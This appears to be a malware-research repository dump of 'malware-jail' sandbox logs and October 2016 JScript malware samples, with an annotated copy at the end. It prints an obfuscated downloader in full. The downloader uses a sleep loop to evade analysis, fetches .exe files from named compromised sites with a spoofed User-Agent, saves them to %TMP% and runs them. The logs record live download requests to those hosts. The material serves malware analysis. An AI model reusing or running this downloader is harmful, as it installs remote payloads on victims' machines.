78 | 7 Oct 21:57:27 - MSXML2.XMLHTTP[13].ResponseBody.get() => (object) '' 79 | 7 Oct 21:57:27 - Saving: output/TemporaryFolder_TempFile[15] 80 | 7 Oct 21:57:27 - Generated file saved 81 | 7 Oct 21:57:27 - The sandbox context has been saved to: sandbox_dump_after.json 82 | -------------------------------------------------------------------------------- /malware/20161008/140da02684fd276b6c989317c8ba13f066373dc2623153776da5b8a3e4c7a59f.js: -------------------------------------------------------------------------------- 1 | var params = "2ceb07f5fca8d743cbe59f1377900257"; 2 | var lnbpc = 'vtaere tnnexzmuuyghrnfhl=v\'zdh ureofvxaj=yltrn"amxurhlojlelpofoyntakrrchahfddbeosuegaaiqugehukeksnqituelnb"ism.zezny=jwe;naoictgczvt nAhjxbpOvesewXvMi"c(dSscntq.b2hLbXcXpMnTbTpHlPkMtLz=zbv;fny"p)tcgAm 
itbeeweOxXnehbbigvv(rthcc"tjjesphikrhttSvcbFs.ugwixitnmsryzSztzlbeejebyOremezmx;h)r"etkcktn=ccr{yWkrkytplicrotiSachiurrcgpt.rSilxlwugNptiFgim;pexfrazmhieFc.zld(mbksxiyxmtlegEn)s)bcebzsv(wehlsesto.hDaevluiq(selFqca}q;taact)gek(qhe)wtcclrjovfm(o{v}iil dra=dvrai=e Preparing Sandbox environment. 8 | 8 Oct 20:54:01 - => Executing: env/utils.js 9 | 8 Oct 20:54:01 - => Executing: env/eval.js 10 | 8 Oct 20:54:01 - Preparing sandbox to intercept eval() calls. 11 | 8 Oct 20:54:01 - => Executing: env/function.js 12 | 8 Oct 20:54:01 - Preparing sandbox to intercept 'new Function()' calls. 13 | 8 Oct 20:54:01 - => Executing: env/wscript.js 14 | 8 Oct 20:54:01 - Preparing sandbox to emulate WScript environment. 15 | 8 Oct 20:54:01 - => Executing: env/browser.js 16 | 8 Oct 20:54:01 - Preparing sandbox to emulate Browser environment (default = IE11). 17 | 8 Oct 20:54:01 - Created: window[1] 18 | 8 Oct 20:54:01 - Created: document[2] 19 | 8 Oct 20:54:01 - document[2].createElement(html) 20 | 8 Oct 20:54:01 - Element[3] created, named: 'html' 21 | 8 Oct 20:54:01 - document[2].createElement(body) 22 | 8 Oct 20:54:01 - Element[5] created, named: 'body' 23 | 8 Oct 20:54:01 - document[2].body = 'Element[5]' 24 | 8 Oct 20:54:01 - document[2].createElement(head) 25 | 8 Oct 20:54:01 - Element[7] created, named: 'head' 26 | 8 Oct 20:54:01 - Element[3].appendChild(Element[7]) 27 | 8 Oct 20:54:01 - Element[3].firstChild set 28 | 8 Oct 20:54:01 - document[2].body.get() => Element[5] 29 | 8 Oct 20:54:01 - Element[3].appendChild(Element[5]) 30 | 8 Oct 20:54:01 - => Executing: env/agents.js 31 | 8 Oct 20:54:01 - Setting Browser environment to: IE8 on Win10 64bit 32 | 8 Oct 20:54:01 - window[1].userAgent.get() => Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; WOW64; Trident/7.0; Touch; .NET4.0C; .NET4.0E; . ... (truncated) 33 | 8 Oct 20:54:01 - => Executing: env/other.js 34 | 8 Oct 20:54:01 - => Executing: env/console.js 35 | 8 Oct 20:54:01 - ==> Executing malware file(s). 
36 | 8 Oct 20:54:01 - => Executing: malware/20161008/140da02684fd276b6c989317c8ba13f066373dc2623153776da5b8a3e4c7a59f.js 37 | 8 Oct 20:54:01 - Error.number => 2 38 | 8 Oct 20:54:01 - Strict mode: false 39 | 8 Oct 20:54:01 - Calling eval() no.: 1 40 | 8 Oct 20:54:01 - Strict mode: false 41 | 8 Oct 20:54:01 - Calling eval() no.: 2 42 | 8 Oct 20:54:01 - ActiveXObject(MSXML2.XMLHTTP) 43 | 8 Oct 20:54:01 - Created: MSXML2.XMLHTTP[9] 44 | 8 Oct 20:54:01 - ActiveXObject(Scripting.FileSystemObject) 45 | 8 Oct 20:54:01 - Scripting.FileSystemObject[10] created. 46 | 8 Oct 20:54:01 - Scripting.FileSystemObject[10].FileExists(script_full_name.js) 47 | 8 Oct 20:54:01 - Scripting.FileSystemObject[10].DeleteFile(script_full_name.js) 48 | 8 Oct 20:54:01 - MSXML2.XMLHTTP[9].open(GET,https://oolohlafrancaisedesqueues.net/2ceb07f5fca8d743cbe59f1377900257.flv,false) 49 | 8 Oct 20:54:01 - MSXML2.XMLHTTP[9].async = (boolean) 'false' 50 | 8 Oct 20:54:01 - MSXML2.XMLHTTP[9].async.get() => (boolean) 'false' 51 | 8 Oct 20:54:01 - MSXML2.XMLHTTP[9].send(null) 52 | 8 Oct 20:54:02 - MSXML2.XMLHTTP[9].onreadystatechange(), readyState = 4 length: 162 status: 404 53 | 8 Oct 20:54:02 - MSXML2.XMLHTTP[9] statusText = null 54 | 8 Oct 20:54:02 - MSXML2.XMLHTTP[9].responseBody = (object) '??404 Not Found????

404 Not Found ... (truncated)' 55 | 8 Oct 20:54:02 - MSXML2.XMLHTTP[9].status = (number) '404' 56 | 8 Oct 20:54:02 - MSXML2.XMLHTTP[9].onreadystatechange() undefined 57 | 8 Oct 20:54:02 - MSXML2.XMLHTTP[9].send(null) finished 58 | 8 Oct 20:54:02 - MSXML2.XMLHTTP[9].ResponseText.get() => (string) '??404 Not Found????

404 Not Found ... (truncated)' 59 | 8 Oct 20:54:02 - MSXML2.XMLHTTP[9].ResponseText.get() => (string) '??404 Not Found????

404 Not Found ... (truncated)' 60 | 8 Oct 20:54:02 - MSXML2.XMLHTTP[9].open(GET,https://oolohlafrancaisedesqueues.net/2ceb07f5fca8d743cbe59f1377900257.mp4,false) 61 | 8 Oct 20:54:02 - MSXML2.XMLHTTP[9].async = (boolean) 'false' 62 | 8 Oct 20:54:02 - MSXML2.XMLHTTP[9].async.get() => (boolean) 'false' 63 | 8 Oct 20:54:02 - MSXML2.XMLHTTP[9].send(null) 64 | 8 Oct 20:54:02 - MSXML2.XMLHTTP[9].onreadystatechange(), readyState = 4 length: 162 status: 404 65 | 8 Oct 20:54:02 - MSXML2.XMLHTTP[9] statusText = null 66 | 8 Oct 20:54:02 - MSXML2.XMLHTTP[9].responseBody = (object) '??404 Not Found????

404 Not Found ... (truncated)' 67 | 8 Oct 20:54:02 - MSXML2.XMLHTTP[9].status = (number) '404' 68 | 8 Oct 20:54:02 - MSXML2.XMLHTTP[9].onreadystatechange() undefined 69 | 8 Oct 20:54:02 - MSXML2.XMLHTTP[9].send(null) finished 70 | 8 Oct 20:54:02 - MSXML2.XMLHTTP[9].ResponseText.get() => (string) '??404 Not Found????

404 Not Found ... (truncated)' 71 | 8 Oct 20:54:02 - Strict mode: false 72 | 8 Oct 20:54:02 - Calling eval() no.: 3 73 | 8 Oct 20:54:02 - Exception occured: object SyntaxError: Invalid or unexpected token 74 | at eval (env/eval.js:24:12) 75 | at eval (eval at eval (env/eval.js:24:12), :1:2178) 76 | at eval (env/eval.js:24:12) 77 | at eval (eval at eval (env/eval.js:24:12), :1:2851) 78 | at eval (env/eval.js:24:12) 79 | at malware/20161008/140da02684fd276b6c989317c8ba13f066373dc2623153776da5b8a3e4c7a59f.js:26:1 80 | at ContextifyScript.Script.runInContext (vm.js:35:29) 81 | at Object.exports.runInContext (vm.js:67:17) 82 | at run_in_ctx (/media/usb2/home/hynek/jscript/malware-jail/jailme.js:145:16) 83 | at Object. (/media/usb2/home/hynek/jscript/malware-jail/jailme.js:168:1) 84 | 8 Oct 20:54:02 - ==> Cleaning up sandbox. 85 | 8 Oct 20:54:02 - ==> Script execution finished, dumping sandbox environment to a file. 86 | 8 Oct 20:54:02 - MSXML2.XMLHTTP[9].ResponseBody.get() => (object) '??404 Not Found????

404 Not Found ... (truncated)' 87 | 8 Oct 20:54:02 - The sandbox context has been saved to: sandbox_dump_after.json 88 | -------------------------------------------------------------------------------- /malware/20161013/802577e503bd1880e57b3bd3d3ed047d90a0f0aa0dee89a04a90944fc1f74f27.out: -------------------------------------------------------------------------------- 1 | 13 Oct 23:47:06 - mailware-jail, a malware sandbox ver. 0.8 2 | 13 Oct 23:47:06 - ------------------------ 3 | 13 Oct 23:47:06 - Sandbox environment sequence: env/utils.js,env/eval.js,env/function.js,env/wscript.js,env/browser.js,env/agents.js,env/other.js,env/console.js 4 | 13 Oct 23:47:06 - Malware files: malware/20161013/802577e503bd1880e57b3bd3d3ed047d90a0f0aa0dee89a04a90944fc1f74f27.js 5 | 13 Oct 23:47:06 - Output file for sandbox dump: sandbox_dump_after.json 6 | 13 Oct 23:47:06 - Output directory for generated files: output/ 7 | 13 Oct 23:47:06 - ==> Preparing Sandbox environment. 8 | 13 Oct 23:47:06 - => Executing: env/utils.js 9 | 13 Oct 23:47:06 - => Executing: env/eval.js 10 | 13 Oct 23:47:06 - Preparing sandbox to intercept eval() calls. 11 | 13 Oct 23:47:06 - => Executing: env/function.js 12 | 13 Oct 23:47:06 - Preparing sandbox to intercept 'new Function()' calls. 13 | 13 Oct 23:47:06 - => Executing: env/wscript.js 14 | 13 Oct 23:47:06 - Preparing sandbox to emulate WScript environment. 15 | 13 Oct 23:47:06 - => Executing: env/browser.js 16 | 13 Oct 23:47:06 - Preparing sandbox to emulate Browser environment (default = IE11). 
17 | 13 Oct 23:47:06 - Created: window[1] 18 | 13 Oct 23:47:06 - Created: document[2] 19 | 13 Oct 23:47:06 - document[2].createElement(html) 20 | 13 Oct 23:47:06 - Element[3] created, named: 'html' 21 | 13 Oct 23:47:06 - document[2].createElement(body) 22 | 13 Oct 23:47:06 - Element[5] created, named: 'body' 23 | 13 Oct 23:47:06 - document[2].body = 'Element[5]' 24 | 13 Oct 23:47:06 - document[2].createElement(head) 25 | 13 Oct 23:47:06 - Element[7] created, named: 'head' 26 | 13 Oct 23:47:06 - Element[3].appendChild(Element[7]) 27 | 13 Oct 23:47:06 - Element[3].firstChild set 28 | 13 Oct 23:47:06 - document[2].body.get() => Element[5] 29 | 13 Oct 23:47:06 - Element[3].appendChild(Element[5]) 30 | 13 Oct 23:47:06 - => Executing: env/agents.js 31 | 13 Oct 23:47:06 - Setting Browser environment to: IE8 on Win10 64bit 32 | 13 Oct 23:47:06 - window[1].userAgent.get() => Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; WOW64; Trident/7.0; Touch; .NET4.0C; .NET4.0E; . ... (truncated) 33 | 13 Oct 23:47:06 - => Executing: env/other.js 34 | 13 Oct 23:47:06 - => Executing: env/console.js 35 | 13 Oct 23:47:06 - ==> Executing malware file(s). 
36 | 13 Oct 23:47:06 - => Executing: malware/20161013/802577e503bd1880e57b3bd3d3ed047d90a0f0aa0dee89a04a90944fc1f74f27.js 37 | 13 Oct 23:47:06 - WScript.Sleep(500) 38 | 13 Oct 23:47:06 - WScript.Sleep(500) 39 | 13 Oct 23:47:07 - WScript.Sleep(500) 40 | 13 Oct 23:47:07 - WScript.Sleep(500) 41 | 13 Oct 23:47:08 - WScript.Sleep(500) 42 | 13 Oct 23:47:08 - WScript.Sleep(500) 43 | 13 Oct 23:47:09 - WScript.Sleep(500) 44 | 13 Oct 23:47:09 - WScript.Sleep(500) 45 | 13 Oct 23:47:10 - WScript.Sleep(500) 46 | 13 Oct 23:47:10 - WScript.Sleep(500) 47 | 13 Oct 23:47:11 - WScript.Sleep(500) 48 | 13 Oct 23:47:11 - WScript.Sleep(500) 49 | 13 Oct 23:47:12 - WScript.Sleep(500) 50 | 13 Oct 23:47:12 - WScript.Sleep(500) 51 | 13 Oct 23:47:13 - WScript.CreateObject(WScript.Shell) 52 | 13 Oct 23:47:13 - Created: WScript.Shell[9] 53 | 13 Oct 23:47:13 - ActiveXObject(Scripting.FileSystemObject) 54 | 13 Oct 23:47:13 - Scripting.FileSystemObject[10] created. 55 | 13 Oct 23:47:13 - WScript.Shell[9].ExpandEnvironmentStrings(%TMP%) 56 | 13 Oct 23:47:13 - Scripting.FileSystemObject[10].OpenTextFile(%TMP%\XipXkrLd.js) 57 | 13 Oct 23:47:13 - TextStream[11] created. 
58 | 13 Oct 23:47:13 - TextStream[11].Write("Thu Oct 13 2016 23:47:13 GMT+0200 (CEST)" 59 | var SvjUKAc = new Date(); 60 | while(true) { 61 | var XwHvxGz = new Date(); 62 | var ERupxfq = new Date(XwHvxGz.getTime() - SvjUKAc.getTime()); 63 | if(ERupxfq.getSeconds() > 5) { 64 | break; 65 | } 66 | WScript.Sleep(500); 67 | } 68 | function ckCgnMtxxk(ibZdbdKp,CnWtQRBnxBRw) {nhjyEhX=0x1;ScLQeYp=0x0;ibZdbdKp.Run(CnWtQRBnxBRw, nhjyEhX, ScLQeYp);} 69 | /*ToakIoXNFCHbmPvwLmfYFFdfZfhOyyKAhVBlGhbuYuaaPtQBjpqWMUQICukLkzPCPvwfXTyVLfMTKQFAbmUNmdXfyCGAptnxROKUHzooRKSGZhNsmcSyggxwOEwkOhfmmbrBLYyCrirmIspeQMjducrGyzFNHOrVaiscirbJkAkLKwkJOpUBbREKBnhjTpWxiiNxZDYJxM*/URjKuPKyMgrYr(); 70 | var mmcXR = ["http://lcbschool2.ac.th/pic/_notes/logs.php"]; 71 | var Wyiwp = ["http://masseriacarparelli.it/logs2.php"]; 72 | OsLAgfHCfdr(mmcXR, '23.exe'); 73 | OsLAgfHCfdr(Wyiwp, '24.exe'); 74 | function OsLAgfHCfdr(AUePbmz,xjshqCWtQ) { 75 | var RIHh=407-407; 76 | while(true) { 77 | if(AUePbmz.length<=366-366) break; 78 | var EOIT = xEnVXGW() % AUePbmz.length; 79 | var KyRewCCEJ=AUePbmz[EOIT]; 80 | var BIxHp=xEnVXGW(); 81 | var TlJTxfwLxp=xjshqCWtQ; 82 | var WDlUJfS=xjshqCWtQ; 83 | var cvSRFkdY=112-111; 84 | var LRACVIJdS = function(){ 85 | return new ActiveXObject(WDBmH('WS&WmSxvYpcV&cript&WmSxvYpcV&.She&l&l',[0,2,4,5,6],'&')); 86 | }(); 87 | var WDlUJfS = ldNrVl(LRACVIJdS) + String.fromCharCode(92) + WDlUJfS; 88 | var TbZdG = function(){ 89 | return new ActiveXObject(WDBmH('MSX&DiODGVvSB&ML2.XM&nmWtwgNOhvP&LHTTP',[0,2,4],'&')); 90 | }(); 91 | UYCO(KyRewCCEJ,TbZdG); 92 | if (TbZdG.status == 100+100) { 93 | var sWPmhUM = function() { 94 | return new ActiveXObject(WDBmH('ADO&DB&PGXbbEcUF&.&nEvdrVaCd&Stream',[0,1,3,5],'&')); 95 | }(); 96 | var pDdQcrVkhARc=qSeGr(sWPmhUM,TbZdG.ResponseBody,WDlUJfS); 97 | } 98 | try { 99 | ckCgnMtxxk(LRACVIJdS,WDlUJfS); 100 | var xtIxXmh = GetObject('winmgmts:{impersonationLevel=impersonate}').ExecQuery('Select * from Win32_Process Where Name = \''+TlJTxfwLxp+'\''); 101 
| if ( xtIxXmh.Count >= 1 ){break;} 102 | } catch(e) {} 103 | RIHh++; 104 | MBGwN.splice (EOIT,327-326); 105 | } 106 | } 107 | function ldNrVl(ByNmjV){var cxeVjMWm=["ExpandEnvironmentStrings"];return ByNmjV[cxeVjMWm[0]]('%TMP%')} 108 | function qSeGr(fVDGQccj,Cmwwv,JCtZgNyuNT){try{fVDGQccj.open();mEvJHgAm(fVDGQccj);ShSvKwv(fVDGQccj,Cmwwv);EXncmYqiN(fVDGQccj);SAxs(fVDGQccj,JCtZgNyuNT);KlpoACZP=fVDGQccj.size;wcAPLEY(fVDGQccj);return KlpoACZP;}catch(e){}} 109 | function UYCO(pEjdKZ,EZDobvT){try{bkIe = 'G*tqEiSfCEFO*E*T*sqkdtRMjxeQR'.split('*');EZDobvT.open(bkIe[0]+bkIe[2]+bkIe[3], pEjdKZ, false);EZDobvT.setRequestHeader("User-Agent", "Python-urllib/3.1");EZDobvT.send();}catch(e){}} 110 | function WDBmH(mxhXCKNI,zTOiBb,woGPxsmnc){nymYF=mxhXCKNI.split(woGPxsmnc);VvdgKnq = 'isR';for(ltaWmxhr=0;ltaWmxhr Cleaning up sandbox. 128 | 13 Oct 23:47:13 - ==> Script execution finished, dumping sandbox environment to a file. 129 | 13 Oct 23:47:13 - Saving: output/_TMP__XipXkrLd.js 130 | 13 Oct 23:47:13 - Generated file saved 131 | 13 Oct 23:47:13 - The sandbox context has been saved to: sandbox_dump_after.json 132 | -------------------------------------------------------------------------------- /malware/20161013/_TMP__XipXkrLd.js: -------------------------------------------------------------------------------- 1 | "Thu Oct 13 2016 23:47:13 GMT+0200 (CEST)" 2 | var SvjUKAc = new Date(); 3 | while (true) { 4 | var XwHvxGz = new Date(); 5 | var ERupxfq = new Date(XwHvxGz.getTime() - SvjUKAc.getTime()); 6 | if (ERupxfq.getSeconds() > 5) { 7 | break; 8 | } 9 | WScript.Sleep(500); 10 | } 11 | 12 | function ckCgnMtxxk(ibZdbdKp, CnWtQRBnxBRw) { 13 | nhjyEhX = 0x1; 14 | ScLQeYp = 0x0; 15 | ibZdbdKp.Run(CnWtQRBnxBRw, nhjyEhX, ScLQeYp); 16 | } 17 | /*ToakIoXNFCHbmPvwLmfYFFdfZfhOyyKAhVBlGhbuYuaaPtQBjpqWMUQICukLkzPCPvwfXTyVLfMTKQFAbmUNmdXfyCGAptnxROKUHzooRKSGZhNsmcSyggxwOEwkOhfmmbrBLYyCrirmIspeQMjducrGyzFNHOrVaiscirbJkAkLKwkJOpUBbREKBnhjTpWxiiNxZDYJxM*/ 18 | URjKuPKyMgrYr(); 19 | var mmcXR = 
["http://lcbschool2.ac.th/pic/_notes/logs.php"]; 20 | var Wyiwp = ["http://masseriacarparelli.it/logs2.php"]; 21 | OsLAgfHCfdr(mmcXR, '23.exe'); 22 | OsLAgfHCfdr(Wyiwp, '24.exe'); 23 | 24 | function OsLAgfHCfdr(AUePbmz, xjshqCWtQ) { 25 | var RIHh = 407 - 407; 26 | while (true) { 27 | if (AUePbmz.length <= 366 - 366) break; 28 | var EOIT = xEnVXGW() % AUePbmz.length; 29 | var KyRewCCEJ = AUePbmz[EOIT]; 30 | var BIxHp = xEnVXGW(); 31 | var TlJTxfwLxp = xjshqCWtQ; 32 | var WDlUJfS = xjshqCWtQ; 33 | var cvSRFkdY = 112 - 111; 34 | var LRACVIJdS = function() { 35 | return new ActiveXObject(WDBmH('WS&WmSxvYpcV&cript&WmSxvYpcV&.She&l&l', [0, 2, 4, 5, 6], '&')); 36 | }(); 37 | var WDlUJfS = ldNrVl(LRACVIJdS) + String.fromCharCode(92) + WDlUJfS; 38 | var TbZdG = function() { 39 | return new ActiveXObject(WDBmH('MSX&DiODGVvSB&ML2.XM&nmWtwgNOhvP&LHTTP', [0, 2, 4], '&')); 40 | }(); 41 | UYCO(KyRewCCEJ, TbZdG); 42 | if (TbZdG.status == 100 + 100) { 43 | var sWPmhUM = function() { 44 | return new ActiveXObject(WDBmH('ADO&DB&PGXbbEcUF&.&nEvdrVaCd&Stream', [0, 1, 3, 5], '&')); 45 | }(); 46 | var pDdQcrVkhARc = qSeGr(sWPmhUM, TbZdG.ResponseBody, WDlUJfS); 47 | } 48 | try { 49 | ckCgnMtxxk(LRACVIJdS, WDlUJfS); 50 | var xtIxXmh = GetObject('winmgmts:{impersonationLevel=impersonate}').ExecQuery('Select * from Win32_Process Where Name = \'' + TlJTxfwLxp + '\''); 51 | if (xtIxXmh.Count >= 1) { 52 | break; 53 | } 54 | } catch (e) {} 55 | RIHh++; 56 | MBGwN.splice(EOIT, 327 - 326); 57 | } 58 | } 59 | 60 | function ldNrVl(ByNmjV) { 61 | var cxeVjMWm = ["ExpandEnvironmentStrings"]; 62 | return ByNmjV[cxeVjMWm[0]]('%TMP%') 63 | } 64 | 65 | function qSeGr(fVDGQccj, Cmwwv, JCtZgNyuNT) { 66 | try { 67 | fVDGQccj.open(); 68 | mEvJHgAm(fVDGQccj); 69 | ShSvKwv(fVDGQccj, Cmwwv); 70 | EXncmYqiN(fVDGQccj); 71 | SAxs(fVDGQccj, JCtZgNyuNT); 72 | KlpoACZP = fVDGQccj.size; 73 | wcAPLEY(fVDGQccj); 74 | return KlpoACZP; 75 | } catch (e) {} 76 | } 77 | 78 | function UYCO(pEjdKZ, EZDobvT) { 79 | try { 80 | 
bkIe = 'G*tqEiSfCEFO*E*T*sqkdtRMjxeQR'.split('*'); 81 | EZDobvT.open(bkIe[0] + bkIe[2] + bkIe[3], pEjdKZ, false); 82 | EZDobvT.setRequestHeader("User-Agent", "Python-urllib/3.1"); 83 | EZDobvT.send(); 84 | } catch (e) {} 85 | } 86 | 87 | function WDBmH(mxhXCKNI, zTOiBb, woGPxsmnc) { 88 | nymYF = mxhXCKNI.split(woGPxsmnc); 89 | VvdgKnq = 'isR'; 90 | for (ltaWmxhr = 0; ltaWmxhr < zTOiBb.length; ltaWmxhr++) { 91 | VvdgKnq += nymYF[zTOiBb[ltaWmxhr]]; 92 | } 93 | return VvdgKnq.substring(3, VvdgKnq.length); 94 | } 95 | 96 | function URjKuPKyMgrYr() { /*BCKSGFxZTW().Sleep(5311-410);*/ } 97 | 98 | function YEPOLKB() { 99 | var NIZqdP = ["random"]; 100 | return Math[NIZqdP[0]]() 101 | } 102 | 103 | function iPtA(EVWlhq) { 104 | EVWlhq.open(); 105 | } 106 | 107 | function mEvJHgAm(XPaMCcbtn) { 108 | XPaMCcbtn.type = 1; 109 | } 110 | 111 | function ShSvKwv(UBBO, aRAhF) { 112 | UBBO.write(aRAhF); 113 | } 114 | 115 | function BCKSGFxZTW() { 116 | return /*XQRmBOFMbTPjQDAMKQpicfpILteYagMoPpTqwtDpMrwYdHDBnmBJHHxIfOUkXgZzcIpnLSVMQJxHJEZjjChdGcYCTcfpoaFEIVeetkGco*/ WScript; 117 | } 118 | 119 | function EXncmYqiN(hbpFEH) { 120 | var pOTTAMeVOw = []; 121 | hbpFEH.position = pOTTAMeVOw.length * (4714679 - 679); 122 | } 123 | 124 | function SAxs(nTrxTKR, kQmMEIk) { 125 | nTrxTKR.saveToFile(kQmMEIk, 2); 126 | } 127 | 128 | function wcAPLEY(NZHgp) { 129 | NZHgp.close(); 130 | } 131 | 132 | function xEnVXGW() { 133 | var AzTJ = 99999 + 1; 134 | var vaVlYa = 100; 135 | return Math.round(YEPOLKB() * (AzTJ - vaVlYa) + vaVlYa); 136 | } 137 | 138 | function QOawkeUO(iqwZo) { 139 | var maBHbxuS = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'; 140 | for (var xfbbJ = 0; xfbbJ < iqwZo; xfbbJ++) { 141 | QvLxV += maBHbxuS.charAt(Math.floor(Math.random() * maBHbxuS.length)); 142 | } 143 | return QvLxV; 144 | } 145 | 146 | function xfgtzigMYScAlH(XVdzyJUSJbBLjI) { 147 | return new ActiveXObject(XVdzyJUSJbBLjI); 148 | } 149 | 
-------------------------------------------------------------------------------- /malware/20161013/_TMP__XipXkrLd.out: -------------------------------------------------------------------------------- 1 | 14 Oct 00:03:18 - mailware-jail, a malware sandbox ver. 0.8 2 | 14 Oct 00:03:18 - ------------------------ 3 | 14 Oct 00:03:18 - Sandbox environment sequence: env/utils.js,env/eval.js,env/function.js,env/wscript.js,env/browser.js,env/agents.js,env/other.js,env/console.js 4 | 14 Oct 00:03:18 - Malware files: malware/20161013/_TMP__XipXkrLd.js 5 | 14 Oct 00:03:18 - Output file for sandbox dump: sandbox_dump_after.json 6 | 14 Oct 00:03:18 - Output directory for generated files: output/ 7 | 14 Oct 00:03:18 - ==> Preparing Sandbox environment. 8 | 14 Oct 00:03:18 - => Executing: env/utils.js 9 | 14 Oct 00:03:18 - => Executing: env/eval.js 10 | 14 Oct 00:03:18 - Preparing sandbox to intercept eval() calls. 11 | 14 Oct 00:03:18 - => Executing: env/function.js 12 | 14 Oct 00:03:18 - Preparing sandbox to intercept 'new Function()' calls. 13 | 14 Oct 00:03:18 - => Executing: env/wscript.js 14 | 14 Oct 00:03:18 - Preparing sandbox to emulate WScript environment. 15 | 14 Oct 00:03:18 - => Executing: env/browser.js 16 | 14 Oct 00:03:18 - Preparing sandbox to emulate Browser environment (default = IE11). 
17 | 14 Oct 00:03:18 - Created: window[1] 18 | 14 Oct 00:03:18 - Created: document[2] 19 | 14 Oct 00:03:18 - document[2].createElement(html) 20 | 14 Oct 00:03:18 - Element[3] created, named: 'html' 21 | 14 Oct 00:03:18 - document[2].createElement(body) 22 | 14 Oct 00:03:18 - Element[5] created, named: 'body' 23 | 14 Oct 00:03:18 - document[2].body = 'Element[5]' 24 | 14 Oct 00:03:18 - document[2].createElement(head) 25 | 14 Oct 00:03:18 - Element[7] created, named: 'head' 26 | 14 Oct 00:03:18 - Element[3].appendChild(Element[7]) 27 | 14 Oct 00:03:18 - Element[3].firstChild set 28 | 14 Oct 00:03:18 - document[2].body.get() => Element[5] 29 | 14 Oct 00:03:18 - Element[3].appendChild(Element[5]) 30 | 14 Oct 00:03:18 - => Executing: env/agents.js 31 | 14 Oct 00:03:18 - Setting Browser environment to: IE8 on Win10 64bit 32 | 14 Oct 00:03:18 - window[1].userAgent.get() => Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; WOW64; Trident/7.0; Touch; .NET4.0C; .NET4.0E; . ... (truncated) 33 | 14 Oct 00:03:18 - => Executing: env/other.js 34 | 14 Oct 00:03:18 - => Executing: env/console.js 35 | 14 Oct 00:03:18 - ==> Executing malware file(s). 
36 | 14 Oct 00:03:18 - => Executing: malware/20161013/_TMP__XipXkrLd.js 37 | 14 Oct 00:03:18 - WScript.Sleep(500) 38 | 14 Oct 00:03:18 - WScript.Sleep(500) 39 | 14 Oct 00:03:19 - WScript.Sleep(500) 40 | 14 Oct 00:03:19 - WScript.Sleep(500) 41 | 14 Oct 00:03:20 - WScript.Sleep(500) 42 | 14 Oct 00:03:20 - WScript.Sleep(500) 43 | 14 Oct 00:03:21 - WScript.Sleep(500) 44 | 14 Oct 00:03:21 - WScript.Sleep(500) 45 | 14 Oct 00:03:22 - WScript.Sleep(500) 46 | 14 Oct 00:03:22 - WScript.Sleep(500) 47 | 14 Oct 00:03:23 - WScript.Sleep(500) 48 | 14 Oct 00:03:23 - WScript.Sleep(500) 49 | 14 Oct 00:03:24 - ActiveXObject(WScript.Shell) 50 | 14 Oct 00:03:24 - Created: WScript.Shell[9] 51 | 14 Oct 00:03:24 - WScript.Shell[9].ExpandEnvironmentStrings(%TMP%) 52 | 14 Oct 00:03:24 - ActiveXObject(MSXML2.XMLHTTP) 53 | 14 Oct 00:03:24 - Created: MSXML2.XMLHTTP[10] 54 | 14 Oct 00:03:24 - MSXML2.XMLHTTP[10].open(GET,http://lcbschool2.ac.th/pic/_notes/logs.php,false) 55 | 14 Oct 00:03:24 - MSXML2.XMLHTTP[10].async = (boolean) 'false' 56 | 14 Oct 00:03:24 - MSXML2.XMLHTTP[10].async.get() => (boolean) 'false' 57 | 14 Oct 00:03:24 - MSXML2.XMLHTTP[10].setRequestHeader(User-Agent, Python-urllib/3.1) 58 | 14 Oct 00:03:24 - MSXML2.XMLHTTP[10].send(undefined) 59 | 14 Oct 00:03:41 - MSXML2.XMLHTTP[10].onreadystatechange(), readyState = 4 length: 16 status: 404 60 | 14 Oct 00:03:41 - MSXML2.XMLHTTP[10] statusText = null 61 | 14 Oct 00:03:41 - MSXML2.XMLHTTP[10].responseBody = (object) 'File not found.?' 
62 | 14 Oct 00:03:41 - MSXML2.XMLHTTP[10].status = (number) '404' 63 | 14 Oct 00:03:41 - MSXML2.XMLHTTP[10].onreadystatechange() undefined 64 | 14 Oct 00:03:41 - MSXML2.XMLHTTP[10].send(undefined) finished 65 | 14 Oct 00:03:41 - MSXML2.XMLHTTP[10].status.get() => (number) '404' 66 | 14 Oct 00:03:41 - WScript.Shell[9].Run(%TMP%\23.exe, 1, 0) 67 | 14 Oct 00:03:41 - Exception occured: object ReferenceError: MBGwN is not defined 68 | at OsLAgfHCfdr (malware/20161013/_TMP__XipXkrLd.js:56:9) 69 | at malware/20161013/_TMP__XipXkrLd.js:21:1 70 | at ContextifyScript.Script.runInContext (vm.js:35:29) 71 | at Object.exports.runInContext (vm.js:67:17) 72 | at run_in_ctx (/media/usb2/home/hynek/jscript/malware-jail/jailme.js:145:16) 73 | at Object. (/media/usb2/home/hynek/jscript/malware-jail/jailme.js:168:1) 74 | at Module._compile (module.js:556:32) 75 | at Object.Module._extensions..js (module.js:565:10) 76 | at Module.load (module.js:473:32) 77 | at tryModuleLoad (module.js:432:12) 78 | 14 Oct 00:03:41 - ==> Cleaning up sandbox. 79 | 14 Oct 00:03:41 - ==> Script execution finished, dumping sandbox environment to a file. 80 | 14 Oct 00:03:41 - MSXML2.XMLHTTP[10].ResponseBody.get() => (object) 'File not found.?' 
81 | 14 Oct 00:03:41 - The sandbox context has been saved to: sandbox_dump_after.json 82 | -------------------------------------------------------------------------------- /malware/20161013/out/malware_20161013__TMP__XipXkrLd.js: -------------------------------------------------------------------------------- 
// analyst note: sandbox-saved copy of the JScript downloader whose run is logged above
// (WScript.Sleep loop, WScript.Shell, MSXML2.XMLHTTP GET with a Python-urllib User-Agent,
// ADODB.Stream written to %TMP%, Run(), WMI Win32_Process query). Identifiers are random;
// COM ProgIDs are rebuilt from fragments by WDBmH(). Resolved names quoted below are the
// ones the sandbox log above reports.
1 | "Thu Oct 13 2016 23:47:13 GMT+0200 (CEST)"
// line 1 is a bare string expression statement (a timestamp); it has no effect.
2 | var SvjUKAc = new Date();
// lines 2-10: delay loop, sleeps 500 ms at a time until more than 5 s have elapsed; the
// log above shows the twelve WScript.Sleep(500) calls. Delaying before any network or
// disk activity is a common way to outlast short automated-analysis windows.
3 | while (true) {
4 | var XwHvxGz = new Date();
5 | var ERupxfq = new Date(XwHvxGz.getTime() - SvjUKAc.getTime());
6 | if (ERupxfq.getSeconds() > 5) {
7 | break;
8 | }
9 | WScript.Sleep(500);
10 | }
11 | 
